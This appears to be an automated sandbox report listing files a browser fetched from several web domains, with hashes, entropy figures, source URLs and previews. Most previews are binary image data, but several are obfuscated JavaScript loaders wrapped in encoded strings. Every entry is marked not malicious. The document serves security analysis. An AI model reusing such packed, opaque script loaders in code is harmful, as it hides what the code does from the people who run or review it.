                                                                                                                                                          SHA-256:6B2C31A33F6574E308641D2EE1BE0ADAFCFB0C735C39AA4CA94F366484B1A15F
                                                                                                                                                          SHA-512:7BE85065D73C530092DAD8ED6B45B21485800DBEA1635DB76399A13B9934912B34042F394D5581FA1D8AFC1CBC54C8CAF000DADCCC65FF016F3690A857D31281
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/slot/img_title.png
                                                                                                                                                          Preview:.PNG........IHDR.......G............tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:F071221EF3A011E79FBACA51571BFDC0" xmpMM:DocumentID="xmp.did:F071221FF3A011E79FBACA51571BFDC0"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F071221CF3A011E79FBACA51571BFDC0" stRef:documentID="xmp.did:F071221DF3A011E79FBACA51571BFDC0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>1..!..3.IDATx..}......{fn.^Yv....w.P.Q.]4...i,....D...5............F.....HG.. l......{f..{v..e.1..}..8.v.{..m..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (7772), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):7772
                                                                                                                                                          Entropy (8bit):5.939544686334862
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:VKahWGzleTN5zLHEQoofimf7odRWiZi8VM7UB7xNaO2:VTWWe7w/ofiAIIi4ECk7x+
                                                                                                                                                          MD5:C8D564121A4681213677D108F48B4ED6
                                                                                                                                                          SHA1:F275203BBB3CB4384FF045555A7D5E31F03DB152
                                                                                                                                                          SHA-256:56820083C0A0EE4E283CF884236870EA829A303917513EBF88D80E9894EC3CFF
                                                                                                                                                          SHA-512:E2B798C82A75E9D0098002D4C06CE985FC922E5411E56395ACB82AC055412DF752DCF8B74708A063948EF2B325A74001EBD7FD0C12A015BC74654C9CBE86B569
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/367/login.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtALADgEYBdAGgG8wAPANQCYAuAMwFc0YAXAS3UxFI6k0ASnIAiFkhAACJBwBOXTmIDcAeTAArEJwB0AExBMuaEAAV5KCCHkcAnpkFiA+s5BIAsin0sANiDEKADcoXxYQBgBCAAYAX2EVEPlpKABeNEwxABF9fGAxYVIUdN0MqEKudMzomAgmAtIkKrEAOQBNKjUG+VTMFExhTHJY0g1tTkwkXQBbKAgAcRAODhskQewxLiQAGRQAcxNAzaQAFXk7M18oOyOpeSClEABVeV8j332TAEl9I7BQqDsAKkCRoeQgKD6FoobgwYFiJBoADKS24aD2RwAFlAkE8wRD9B4oFw3sRCuR9FAOFAANIgOzMNicHgZUTgjgseRoaQcTFbXRwekAaiJvN08kB+hQ0wGsXiRQGQxGYx0HEmMzmHhY1O46DWQykHAAwnMODBsV80EwUAwxEiAKInZxGgCCZhORoAEi7nF8WgAxLry8h7JYtEDAbYmCKsdi6jIgNlLTnc5y6EBofRIADqXF5fF0MCuAC9iyDTJHowURtSwCZDFRGXGWXxREkeakNpIbD8jtAkEhgCh5L8QTBTeaoEbvAFiCp2SmALSESKpVIcXT1kCdJitgD8G63O9bQsItrEI1DHDOFyudgAQhw0E3mbxE+QF1zIrz+Vsb5drgAH0A5dV07MQPj2NRtSObt5BaKBpnhWAYBQNgODEYhN0zbc1F3RMRjzEBphOFAjRLYsX3jPgBFEa15Ewds0E7Mg0miFQoAAHhAXR/HRXkOKFIVhDQXQIEkTFMAAemwF1FwALWIKTdBWOQ+GwKAyT3Rw9xcMRbUXAohRADSsI4FBdlAeQTSkAYGBMzSEk/bkOF0+8/SyZwxCFUTNBQExMgKFSUCeCBrGsnEQDs3z/IyMRq1IIiSJQe96yolt33bDhwLAJ9dgONA/iff1hyvIq0AAJRAA45Bscqb3Ko
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 219 x 79, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17656
                                                                                                                                                          Entropy (8bit):7.974380599215593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:oND1LLTlfbdpIAdJ9Dq1v3I8FwBYj6nfB/N+oc/HT1G:oND1LPljdCAd3Kv3IbBKel+oF
                                                                                                                                                          MD5:1CFB3832703290CBD8F6CA434259F05C
                                                                                                                                                          SHA1:33083B2E7D3E3F101384438FF11E2A54BE8ED99A
                                                                                                                                                          SHA-256:18D19E00E6332168844737B52F315CA8AF95F05B9F7F6C25382B7DCD98C1390B
                                                                                                                                                          SHA-512:17F2237AF6155AF2D4CA5C2F37F9540113C1CF39B7F8C9066DD9E29C91256807471182B55C792EEABD41A31F51D50C16F14FA9343896D8D1BB7E0F18B31CCDAB
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......O.....bt......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:5CB9DEECF3A011E781559EC40689F6C7" xmpMM:DocumentID="xmp.did:5CB9DEEDF3A011E781559EC40689F6C7"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5CB9DEEAF3A011E781559EC40689F6C7" stRef:documentID="xmp.did:5CB9DEEBF3A011E781559EC40689F6C7"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.YGI..AhIDATx..}.`......l6.N.@.$..Cq+R.....).@....@q.....!.K.!....M...o.... .........y3..w....N....qP....-ui1..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 635
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):431
                                                                                                                                                          Entropy (8bit):7.4934780132929495
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XXWJdFuB29sE7jgQaTQIHqlBerth2wEK6wuO2Iu/:XXWJdFsDEQlrHWB2QrUbo
                                                                                                                                                          MD5:EE1F28F59BC095C075D29DCF5A3EE1E9
                                                                                                                                                          SHA1:073584A9DAB2F999BB3BC2B45837232A7182DED5
                                                                                                                                                          SHA-256:B916E0A30F5B07409434924174F16716C008C91182E82CED7438EFE2C9E5C5BA
                                                                                                                                                          SHA-512:47EBF70058592267F62627EC1A09B133C854DDDFCC2B41D7CF2C5506D1AA769656BBCD47FA78D19E744EBC997A7C08E9230EAF1F8654C8EC42965F8C60924D3C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/lt-cloud/stat.do?pv=ajax&pa=host.info&domain=hg679.cc&withAgentCode=1&withSettings=1&terminal=1&ts=17972842649569
                                                                                                                                                          Preview:..........T..n.0...<..U...F.n...H..R.U......7.&f.AQ.6.m:.fF?....:.M..N....B....I.pr.,*...2(..6q..5.W6..B......*..6.bTU;...yj...L.g./...zgtSA.Pc..p6H..ha...w.p.F..M.>........N.U.../b[......O..)P....n.5NH.p.l..Y8..7...J.f..U...~[..9.G/zE...7.H......2.F/...*.<g1.[-y...n.o.........I.d.W..0lW.\.$7.L...f..%v..k>...).vX..8.n..Z!...U...j..u.".]E....P......>?+WUl...O.!.&.V..y.<'9...L.-N.#.....5.. ../...........bZ{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (828), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):828
                                                                                                                                                          Entropy (8bit):5.744836239627214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VF0NQQDwJJ7/T2EHyet+P3HbhjjTVxcIZ:VoQQDwJNyIyNP37NVxzZ
                                                                                                                                                          MD5:DD9D07FFA9E54F10F61648DD5B250539
                                                                                                                                                          SHA1:0DD73F38912422D9A60B286865C87C037F9E9D00
                                                                                                                                                          SHA-256:7E01F143F7E13941140B1D147F64C8B44CABE2998F6BEECDFB1F0064839F864D
                                                                                                                                                          SHA-512:C7BA07F571E6EEB2C6B77BFD3FB45A8CDEC26AF16513AA79CC51969BBCDCE0E6E8C8522393B632185B4ECB8DAAA2DF9F337A281DCE90914740DEF8F6DE11C1D6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/382/footerCopyRight.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjLgFgE4BdAGgG8AtAaQHUBPALgDMBXNGAFwEt1MuZNGRABKCgCI2SEAAIkXAE49uEgNwB5MACsQ3AHQATECx5oQABUUoIIRVwaZhEgPouQSALIpDbADYgEpQAblB+bCBMAIQADAC+omqhirIoALwgmBIxMBAsEqJkPGkUhlBcUKwc3HxomOKKIFxsimgUMDYMAEo8AOYAFlxMEkEwhmgW5f1MKEYmUP5c+gDC6ApQaEtjaAASKApxcWQAtk39PkhMFEcwjeUghlWcvPziybJcaVz9PEhCacAzIYUMB9ABlGgASQAcmpMhJcABBbS9ApZfQAegkAGo0NiJBigSAAB76bRIAr6b4gOrsZ61JziLadHoDT5ofQsFAoLh2fQdCDdPqDJJQFIgNIcrk8vkCoVstRLAAk5mJXAAKio4Jg6TVXhRZsYWAs/EsAKq8Pz6XpNVaC1mDTAgMi6l51NANJotNAffks4XshJB0RHY4oDi8x6uhniQ5kGAlRpoYyKJ56upvMUfL4/P5oL76JW3ED3ACiAVOmxEBZcMj8LH0LhgAB9m2g1I1mq1ZPDDDxgkEKOteDBln4oEhLhJpbzFABaOXKNkSI5LFx+AR++0Bl3VN2Miid709rJ9gdkbBr4Kb2uM0QkEOiENkYcqLo0lMAMTQl2wJDioopIoGRZAAamaGIABxojw8ZkFEuC7vS/BcOI8L9CwwSGAURwSGUFRzsEc64IYMQxAQhgAGxgEEaD+H4iQckaJqfIo+gkhAKD2EgRwYVhab7oIHrXAkahAA==")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (12770), with CRLF line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):48883
                                                                                                                                                          Entropy (8bit):5.895719351461312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:0u8tECCvnRM7cDkbzEUF+ac8qDASSSYu8n+niAVFD8TAdy9pmyQg8jUgFgi09/Ld:0sCaa7c4zEUF4TDASSSYJ+VVVOegN9Z
                                                                                                                                                          MD5:753C69F5B67A5DFE5CF11DDD01470304
                                                                                                                                                          SHA1:E81D212744CB7AA6453BA1EA7621D3DFF5C930BC
                                                                                                                                                          SHA-256:5FF3009B9DB304FC23897443B8249CBDA798CB417999517C5F295BB8CB8B32B7
                                                                                                                                                          SHA-512:E29963F1B911AA839BD194443F432146E85607923D0FF3C702524E8AB6894C318AB8E9CB3BBD5ECA3467046037F6C2F3E3327F20E8D4C08150AEE75018E5B608
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://js326.cc/
                                                                                                                                                          Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="utf-8">.. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1">.. <meta property="og:description" content="Welcome">.. <title></title>.. <style>.. html,.. body {.. margin: 0;.. padding: 0.. }.... .retry {.. display: none;.. text-align: center;.. height: auto;.. width: 100%;.. line-height: 3rem;.. padding: 0 .5rem;.. box-sizing: border-box;.. position: absolute;.. top: 50%;.. left: 50%;.. transform: translate(-50%, -50%);.. }.... .retry .btn {.. border: 1px solid #eee;.. border-radius: 4px;.. width: 120px;.. display: inline-block;.. font-size: 16px;.. cursor: pointer;.. box-sizing: border-box;.. }.... .retry .btn:hover {.. color: red;.. }.... .counts {.. color: red;.. display: inline-block;.. width: 24px.. }.... .iswx {..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 26, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1980
                                                                                                                                                          Entropy (8bit):7.424368149402475
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:nzo7FDNn2DSJ3/T/9yfYLHd0Da5C//FxfT13j9sJXu3tvGpJY:zo7F52ATVyfYLd0hJ9sJXu3dGpm
                                                                                                                                                          MD5:94165A858D58CCDF9C0EDE35D7B663E6
                                                                                                                                                          SHA1:B115210ED9038A73253708925F5D1E16DD68A74D
                                                                                                                                                          SHA-256:DCD5824C741533FD0345FB71E63F599B83F8B668E2C2BF7C12A8C48554C82728
                                                                                                                                                          SHA-512:4BCDB1114340EA12C7206F257231D91C196899AE9A38DCAE3BE08EC1E9099D0C6F03882912CF2A04A8B411215614C3CFF0DA71DDDB95B9B4B9F25AB8795B9792
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A8767C70A6D711E9B6569DFD62A9CABC" xmpMM:DocumentID="xmp.did:A8767C71A6D711E9B6569DFD62A9CABC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A8767C6EA6D711E9B6569DFD62A9CABC" stRef:documentID="xmp.did:A8767C6FA6D711E9B6569DFD62A9CABC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>>L.....1IDATx..Vml.u...........v..jF.9.bB|.@4........]...,.B.NLL.......D..4`./..a....W.FWV....n}...............<....<
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 715 x 242, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):205204
                                                                                                                                                          Entropy (8bit):7.996727380645683
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:6144:jB+np9u6cFmDLpB34ShGmPwelibhuANX5x9:jYnp9udFm3n34ShFGAY
                                                                                                                                                          MD5:A34CA6306B6E15DEFF5B1169C8B0AE33
                                                                                                                                                          SHA1:68162203F1C56481FF288F3F0678860DEDF50321
                                                                                                                                                          SHA-256:F231FC2FB00DCF1512C7A292B7010C9D59C8457D5A6D808E5734B6093843E8CD
                                                                                                                                                          SHA-512:A1DC8689B5DF0C57C6A329457D780503BE1411D59A37C6DA51BE75C0D07D085B128CF0B614802C8B506C3AA95D64904B06B47214D1513A9E5164542627FC2813
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:0E07ED45237B11E885CA96B074FCF8EE" xmpMM:DocumentID="xmp.did:0E07ED46237B11E885CA96B074FCF8EE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0E07ED43237B11E885CA96B074FCF8EE" stRef:documentID="xmp.did:0E07ED44237B11E885CA96B074FCF8EE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>1.......IDATx....Te.5.+.\]U.sn.&4M.I2....#..0.i..0+....%I....:.t7.s...}......_..YK.U..:.}.....:U..(8p.....^|.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1860), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1860
                                                                                                                                                          Entropy (8bit):5.829023981921665
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VldewZmqDJPEtw/owqObi27Vx4uOi3QnyFE1991RMG1qm0VzYFx61cWHCQ0tN:VlMoHDJIwpHBTr3myM991i2JUEFx8sz
                                                                                                                                                          MD5:00A38A8AC85D6CE4AAF728B000BB91E3
                                                                                                                                                          SHA1:AB1883B4DF43F309E5CA34C399E84655BBCC48EF
                                                                                                                                                          SHA-256:85BA5B8A38D59ED24AB6408B066C6FE6AD5B7A2ED645B7E59A44C780F852FA45
                                                                                                                                                          SHA-512:7E3C8594DF0DA6C092F17FC6C9B1CCB6C05AB089C851716C1CFE6312B2966AC765BD1D8C6945AC64D886584F557422D5F42A953B2B6C88D48E93EB2AAAC9FB41
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/phoneBindingPopup.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgDYAGAXQBoBvARTAA58AuAMwFc0YAXAS3UxHJpy3AJSUARKyQgABEk4Anbl3EBuAPJgAViC4A6ACYhm3NCAAKClBBALOAT0xDxAfRcgkAWRQHWAGxBxKgA3KD9WEEYAQmIAXxFVUIUZTgBebkxxABEDOmBxEXIUdL00TE5CpHTM4hgIZgLyBWrxADkATQAPdUaoVMwUTBFMSljyTR0uTAU9AFsoCABxEE5OWyRh7HFuJAAZFABzUyDxJDQAZRWeNAOTnYAVBXtzPyh7E6lbSxQTAPFSESFSgGKCcKAsdhcXhlMQKFasBRoSg7bxgbgBABCpgM0WI5CQAAsUMBorhyGi0AZzESzPd7DZGGh/H5YmMYChZhBWGscYNhqNxtpdJxpnMFstVutNts9odjuRThcrqZbgqHk8Xm8PtIFN9foEAYVgKCYATGMjZUc0BCODw+CAxEkZGhUpwCTtVCAAGRe8rupB6U26OCo9EgLGUobkN07PRnS6rFV6N0gMpsW3Q/hiNBxonAVK4VKpEB6OEHADCUEJ5msrAgADFXgdBHoKVSaSA6TZi63sdT0J36SB4iJWeRZisiQYkOaDAooCT01D7WIA0ZmFB/Jw9ABVHh+OMrStoUJITIQDsAWgg1kvMCgJ6rQWR8wOIAA6twDG7GABOYh4twr4gAAEiA3AHASnCMAArAB+IKDAjDANixJ6OWWStC45gAIL3CBADU4gAPRAVAb7XjAxHsrMszoMRF4Dm2SYQDcQTMOgnDlugJgHIw2CUJ0jCEPgeL2Iw+AAEwwdGICdNB4jiARAjMAAXow4gACzEBAnQyAAarYIJoFA4ixKQ8RsgSwahpi2I2suMKUE6ICuv6qgxgGOz7FaPpRJ5ejqs8rz2D6AWfLqVj6sm1lppCdplGg2Z6LYVgKAA/Guxibn4257uiehhLYnDvlAiIqk4KUKGlcweEg5EOow
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):73468
                                                                                                                                                          Entropy (8bit):5.091252558042021
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:Pes2IPACdZ+hKeVk5hX3Kwe9+uqbyEhhbSJvrN6:Qe
                                                                                                                                                          MD5:51EB9B09319DF9FAF7E17317B3E73CC4
                                                                                                                                                          SHA1:56E049065F172A99B0F32424671E9469D5EC51CC
                                                                                                                                                          SHA-256:01FB715E4FBA06B799A564680AA0E243FC268E2E9F4BAB810F00395FF6F27184
                                                                                                                                                          SHA-512:20E55BCD06E03E121725640889A6B73016563B5C446A44421C70DE0AA369F5C68CC97BFA565F258F38B8EC2A6EDFFA9312494FE2CF2C8C80F55DF7BE389C56E1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://brhrjf.yuhu06.xyz/061410/rcenter/msites/themes/default/style.css
                                                                                                                                                          Preview:body{font-family:'Microsoft YaHei',"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:13px;color:#676a6c;overflow-x:hidden}a:focus,a:active,button::-moz-focus-inner,input[type="reset"]::-moz-focus-inner,input[type="button"]::-moz-focus-inner,input[type="submit"]::-moz-focus-inner,select::-moz-focus-inner,input[type="file"]>input[type="button"]::-moz-focus-inner{border:0;outline:0}.modal-dialog{display:block}div,p{word-break:break-all}h1,h2,h3,h4,h5,h6{font-weight:100}h1{font-size:30px}h2{font-size:24px}h3{font-size:16px}h4{font-size:14px}h5{font-size:12px}h6{font-size:10px}h3,h4,h5{margin-top:5px;font-weight:600}.ft-bold{font-weight:600}.co-red,a.co-red{color:#f34235}.co-red2,a.co-red2{color:#fe0000}.co-red3,a.co-red3{color:#f34235}.co-blue,a.co-blue{color:#2095f2}.co-orange,a.co-orange{color:#ea9100}.co-green,a.co-green{color:#0c3}.co-green2,a.co-green2{color:#4caf50}.co-tomato,a.co-tomato{color:#f60}.co-black,a.co-black{color:#000}.co-gray3,a.co-gray3{color:#333}.co-gray6,a.co-gra
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2401
                                                                                                                                                          Entropy (8bit):7.491652601095067
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:0AinNuijQeJ39cm+E0veEgEeSre0+1K42JkgUOID8KcVJIyG4GbP:yNyq1ZEgvKIaHVJIyG4uP
                                                                                                                                                          MD5:0E3F06E91941C96F4083D1E3D90FDF1D
                                                                                                                                                          SHA1:E4EC0428EBAEC848303C7487C2825771A9F5953C
                                                                                                                                                          SHA-256:1D234FE55D0DBCE915A70854A21F571F7D355EA7A8A36512772FA392F11C2302
                                                                                                                                                          SHA-512:9F67A78D04A8C480448016E6C975FBB9DFA3C8144DCB59368A68A04B796DCFC6907183BB247B66FF0B733CEFF1673655BFC9BA623F949ADD3C915AA552E03CBC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:14393DBDA3A111E98C4BF8052F0E358A" xmpMM:InstanceID="xmp.iid:14393DBCA3A111E98C4BF8052F0E358A" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E3DAAB8FF77711E7B122FFEE1F631D5E" stRef:documentID="xmp.did:E3DAAB90F77711E7B122FFEE1F631D5E"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1390
                                                                                                                                                          Entropy (8bit):7.767542155886903
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:GjixemINGFh6TJ80nT8ddrOQkzbTvWNWUBHs4zp5+rlZZPKUhiq4PdjyME4G1:Gjix1880fQkjshp2jZrUq4PdjG44
                                                                                                                                                          MD5:08DAF0BD0F8536758CF51524F2896ED7
                                                                                                                                                          SHA1:B36359CFC08C4367AB2D09F6CA31F03A503C46D6
                                                                                                                                                          SHA-256:CC4545BD16ACB802417D50A4A50C1A7A8441C536E07AC769AF60345B27E7849B
                                                                                                                                                          SHA-512:AF8D1B61A3452BC238ED6F4DAECE2C4D159E26A78EB5C11980EC584EBB41C3C50502F2B1C509BFA178B8F72650E0058F1888455AED5EC0836856B90D54D70F07
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/card_hl.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...J>C....gipOS_..jZ_...QGPI!&[CK....W._<.X3.hO.e\....qw._H.l]wLb.fV....Tih34v%..[alT^.nsyfm.........h.ze.[.Y.xNo1&....e...$.lG....k:.]3......UAjF.ZD7d%..pm....R8....WV.XG.VSwE.....F..ZG.KC.l.A4..?..]p...54.]AN.x.5 .q``A..wt.N#$....z6.h2..}..\..R..N.M.G..E.B.<.;.;.:.3.0.^0.&........................................~..{.b.q`..[.[..Z.oW.dT..Q.J..H..C.B.@.>..<.:..9..8..4.o4kE2.{1.u1.m1.0.c/.-.O*.?'.X .O .6....l...r...........(..v.......................................................................q..............o{..y.q..q.p..o.m.yk..j..gxzd.nb..a.O`.._.{P..OjmO..N..M..Ka.J..J.GvzG..E.E..D.o;.R8.?8..3..0.0.70nq/..-..-.+.+.o(.c(U2(.$.Q$.<$.#....(.....|......M...l..y....`..."..l.........y.i1.J.....NtRNS....ZU@1..............}ssnec\E.....................................veJA632,(e,.....IDAT(.b...W......,....^k..1}..i?g.a.xZ.H.$........QL.b.H.ywkbbP..=y...~I1.$.m....f..|.]Z.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):17264
                                                                                                                                                          Entropy (8bit):7.957851912730042
                                                                                                                                                          Encrypted:false
